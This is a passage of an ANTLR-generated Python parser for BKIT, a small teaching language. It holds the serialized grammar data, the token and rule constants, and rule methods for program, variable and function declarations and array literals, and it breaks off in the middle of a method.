buf.write(\"\\u014b\\3\\2\\2\\2\\u014d\\u014e\\3\\2\\2\\2\\u014e\\67\\3\\2\\2\\2\\u014f\")\n buf.write(\"\\u014d\\3\\2\\2\\2\\u0150\\u0151\\b\\35\\1\\2\\u0151\\u0152\\5:\\36\")\n buf.write(\"\\2\\u0152\\u0158\\3\\2\\2\\2\\u0153\\u0154\\f\\4\\2\\2\\u0154\\u0155\")\n buf.write(\"\\7\\6\\2\\2\\u0155\\u0157\\5:\\36\\2\\u0156\\u0153\\3\\2\\2\\2\\u0157\")\n buf.write(\"\\u015a\\3\\2\\2\\2\\u0158\\u0156\\3\\2\\2\\2\\u0158\\u0159\\3\\2\\2\\2\")\n buf.write(\"\\u01599\\3\\2\\2\\2\\u015a\\u0158\\3\\2\\2\\2\\u015b\\u015c\\b\\36\\1\")\n buf.write(\"\\2\\u015c\\u015d\\5<\\37\\2\\u015d\\u0163\\3\\2\\2\\2\\u015e\\u015f\")\n buf.write(\"\\f\\4\\2\\2\\u015f\\u0160\\7\\7\\2\\2\\u0160\\u0162\\5<\\37\\2\\u0161\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0162\\u0165\\3\\2\\2\\2\\u0163\\u0161\\3\\2\\2\\2\")\n buf.write(\"\\u0163\\u0164\\3\\2\\2\\2\\u0164;\\3\\2\\2\\2\\u0165\\u0163\\3\\2\\2\")\n buf.write(\"\\2\\u0166\\u0167\\7\\b\\2\\2\\u0167\\u016a\\5<\\37\\2\\u0168\\u016a\")\n buf.write(\"\\5> \\2\\u0169\\u0166\\3\\2\\2\\2\\u0169\\u0168\\3\\2\\2\\2\\u016a=\")\n buf.write(\"\\3\\2\\2\\2\\u016b\\u016c\\7\\t\\2\\2\\u016c\\u016f\\5> \\2\\u016d\\u016f\")\n buf.write(\"\\5@!\\2\\u016e\\u016b\\3\\2\\2\\2\\u016e\\u016d\\3\\2\\2\\2\\u016f?\")\n buf.write(\"\\3\\2\\2\\2\\u0170\\u0171\\5B\\\"\\2\\u0171\\u0172\\5J&\\2\\u0172\\u0175\")\n buf.write(\"\\3\\2\\2\\2\\u0173\\u0175\\5B\\\"\\2\\u0174\\u0170\\3\\2\\2\\2\\u0174\")\n buf.write(\"\\u0173\\3\\2\\2\\2\\u0175A\\3\\2\\2\\2\\u0176\\u0179\\5H%\\2\\u0177\")\n buf.write(\"\\u0179\\5D#\\2\\u0178\\u0176\\3\\2\\2\\2\\u0178\\u0177\\3\\2\\2\\2\\u0179\")\n buf.write(\"C\\3\\2\\2\\2\\u017a\\u0180\\5F$\\2\\u017b\\u017c\\7:\\2\\2\\u017c\\u017d\")\n buf.write(\"\\5\\64\\33\\2\\u017d\\u017e\\7;\\2\\2\\u017e\\u0180\\3\\2\\2\\2\\u017f\")\n buf.write(\"\\u017a\\3\\2\\2\\2\\u017f\\u017b\\3\\2\\2\\2\\u0180E\\3\\2\\2\\2\\u0181\")\n buf.write(\"\\u0185\\5\\20\\t\\2\\u0182\\u0185\\5\\n\\6\\2\\u0183\\u0185\\5\\f\\7\")\n buf.write(\"\\2\\u0184\\u0181\\3\\2\\2\\2\\u0184\\u0182\\3\\2\\2\\2\\u0184\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u0185G\\3\\2\\2\\2\\u0186\\u0187\\7\\3\\2\\2\\u0187\\u0192\")\n buf.write(\"\\7:\\2\\2\\u0188\\u018d\\5\\64\\33\\2\\u0189\\u018a\\7C\\2\\2\\u018a\")\n buf.write(\"\\u018c\\5\\64\\33\\2\\u018b\\u0189\\3\\2\\2\\2\\u018c\\u018f\\3\\2\\2\")\n buf.write(\"\\2\\u018d\\u018b\\3\\2\\2\\2\\u018d\\u018e\\3\\2\\2\\2\\u018e\\u0191\")\n buf.write(\"\\3\\2\\2\\2\\u018f\\u018d\\3\\2\\2\\2\\u0190\\u0188\\3\\2\\2\\2\\u0191\")\n buf.write(\"\\u0194\\3\\2\\2\\2\\u0192\\u0190\\3\\2\\2\\2\\u0192\\u0193\\3\\2\\2\\2\")\n buf.write(\"\\u0193\\u0195\\3\\2\\2\\2\\u0194\\u0192\\3\\2\\2\\2\\u0195\\u0196\\7\")\n buf.write(\";\\2\\2\\u0196I\\3\\2\\2\\2\\u0197\\u0198\\7<\\2\\2\\u0198\\u0199\\5\")\n buf.write(\"\\64\\33\\2\\u0199\\u019a\\7=\\2\\2\\u019a\\u01a1\\3\\2\\2\\2\\u019b\")\n buf.write(\"\\u019c\\7<\\2\\2\\u019c\\u019d\\5\\64\\33\\2\\u019d\\u019e\\7=\\2\\2\")\n buf.write(\"\\u019e\\u019f\\5J&\\2\\u019f\\u01a1\\3\\2\\2\\2\\u01a0\\u0197\\3\\2\")\n buf.write(\"\\2\\2\\u01a0\\u019b\\3\\2\\2\\2\\u01a1K\\3\\2\\2\\2)QWfou\\u0084\\u0089\")\n buf.write(\"\\u008d\\u0090\\u0096\\u009b\\u009f\\u00a8\\u00ab\\u00b4\\u00bc\")\n buf.write(\"\\u00bf\\u00c4\\u00d3\\u00db\\u00e1\\u00f7\\u0104\\u0109\\u012f\")\n buf.write(\"\\u013c\\u0143\\u014d\\u0158\\u0163\\u0169\\u016e\\u0174\\u0178\")\n buf.write(\"\\u017f\\u0184\\u018d\\u0192\\u01a0\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \n \"'For'\", \"'Function'\", \"'If'\", \"'Parameter'\", \"'Return'\", \n \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \"'False'\", \n \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \n \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \n \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \n \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \n \"'int_of_float'\", \"'int_of_string'\", \"'float_to_int'\", \n \"'float_of_string'\", \"'bool_of_string'\", \"'string_of_bool'\", \n \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \n \"MUL_OP\", \"UN_LOGICAL_OP\", \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \n \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \n \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \n \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_array_lit = 5\n RULE_var_list = 6\n RULE_var_non_init = 7\n RULE_composite_var = 8\n RULE_var_init = 9\n RULE_composite_init = 10\n RULE_primitive_init = 11\n RULE_params_list = 12\n RULE_stmt_list = 13\n RULE_stmt = 14\n RULE_if_stmt = 15\n RULE_var_declare_stmt = 16\n RULE_for_stmt = 17\n RULE_while_stmt = 18\n RULE_dowhile_stmt = 19\n RULE_assign_stmt = 20\n RULE_break_stmt = 21\n RULE_continue_stmt = 22\n RULE_call_stmt = 23\n RULE_return_stmt = 24\n RULE_expr = 25\n RULE_expr1 = 26\n RULE_expr2 = 27\n RULE_expr3 = 28\n RULE_expr4 = 29\n RULE_expr5 = 30\n RULE_expr6 = 31\n RULE_expr7 = 32\n RULE_expr8 = 33\n RULE_operand = 34\n RULE_function_call = 35\n RULE_index_op = 36\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_non_init\", \n \"composite_var\", \"var_init\", \"composite_init\", \"primitive_init\", \n \"params_list\", \"stmt_list\", \"stmt\", \"if_stmt\", \"var_declare_stmt\", \n \"for_stmt\", \"while_stmt\", \"dowhile_stmt\", \"assign_stmt\", \n \"break_stmt\", \"continue_stmt\", \"call_stmt\", \"return_stmt\", \n \"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n REL_OP=2\n BIN_LOGICAL_OP=3\n ADD_OP=4\n MUL_OP=5\n UN_LOGICAL_OP=6\n UN_OP=7\n INT_LIT=8\n FLOAT_LIT=9\n BOOL_LIT=10\n STRING_LIT=11\n BODY=12\n BREAK=13\n CONTINUE=14\n DO=15\n ELSE=16\n ELSEIF=17\n ENDIF=18\n ENDBODY=19\n ENDFOR=20\n ENDWHILE=21\n FOR=22\n FUNCTION=23\n IF=24\n PARAMETER=25\n RETURN=26\n THEN=27\n VAR=28\n WHILE=29\n TRUE=30\n FALSE=31\n ENDDO=32\n PLUS_INT=33\n PLUS_FLOAT=34\n MINUS_INT=35\n MINUS_FLOAT=36\n STAR_INT=37\n STAR_FLOAT=38\n DIV_INT=39\n DIV_FLOAT=40\n MOD=41\n NOT=42\n AND=43\n OR=44\n EQUAL=45\n NOT_EQUAL_INT=46\n LESS_INT=47\n GREATER_INT=48\n LESS_OR_EQUAL_INT=49\n GREATER_OR_EQUAL_INT=50\n NOT_EQUAL_FLOAT=51\n LESS_FLOAT=52\n GREATER_FLOAT=53\n LESS_OR_EQUAL_FLOAT=54\n GREATER_OR_EQUAL_FLOAT=55\n LEFT_PAREN=56\n RIGHT_PAREN=57\n LEFT_BRACKET=58\n RIGHT_BRACKET=59\n LEFT_BRACE=60\n RIGHT_BRACE=61\n COLON=62\n DOT=63\n SEMI=64\n COMMA=65\n ASSIGN=66\n DOUBLE_QUOTE=67\n INT_OF_FLOAT=68\n INT_OF_STRING=69\n FLOAT_TO_INT=70\n FLOAT_OF_STRING=71\n BOOL_OF_STRING=72\n STRING_OF_BOOL=73\n STRING_OF_INT=74\n STRING_OF_FLOAT=75\n COMMENT=76\n WS=77\n ILLEGAL_ESCAPE=78\n UNCLOSE_STRING=79\n UNTERMINATED_COMMENT=80\n ERROR_CHAR=81\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 79\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 74\n self.var_declare()\n self.state = 75\n self.match(BKITParser.SEMI)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 85\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 82\n self.function_declare()\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 88\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 90\n self.match(BKITParser.VAR)\n self.state = 91\n self.match(BKITParser.COLON)\n self.state = 92\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 94\n self.match(BKITParser.FUNCTION)\n self.state = 95\n self.match(BKITParser.COLON)\n self.state = 96\n self.match(BKITParser.ID)\n self.state = 100\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 97\n self.match(BKITParser.PARAMETER)\n self.state = 98\n self.match(BKITParser.COLON)\n self.state = 99\n self.params_list()\n\n\n self.state = 102\n self.match(BKITParser.BODY)\n self.state = 103\n self.match(BKITParser.COLON)\n self.state = 109\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 104\n self.var_declare_stmt()\n self.state = 105\n self.match(BKITParser.SEMI)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 115\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE))) != 0):\n self.state = 112\n self.stmt()\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 118\n self.match(BKITParser.ENDBODY)\n self.state = 119\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 121\n self.match(BKITParser.ID)\n self.state = 122\n self.match(BKITParser.ASSIGN)\n self.state = 123\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 125\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 127\n self.match(BKITParser.LEFT_BRACE)\n self.state = 142\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 130\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 128\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 129\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 139\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 132\n self.match(BKITParser.COMMA)\n self.state = 135\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 133\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 134\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 141\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 144\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 148\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.state = 146\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 147\n self.var_init()\n pass\n\n\n self.state = 157\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 150\n self.match(BKITParser.COMMA)\n self.state = 153\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 151\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 152\n self.var_init()\n pass\n\n\n self.state = 159\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_non_init)\n try:\n self.state = 169\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 160\n self.match(BKITParser.ID)\n self.state = 164 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 161\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 162\n self.match(BKITParser.INT_LIT)\n self.state = 163\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 166 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 168\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 171\n self.match(BKITParser.ID)\n self.state = 176 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 172\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 173\n self.expr()\n self.state = 174\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 178 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return 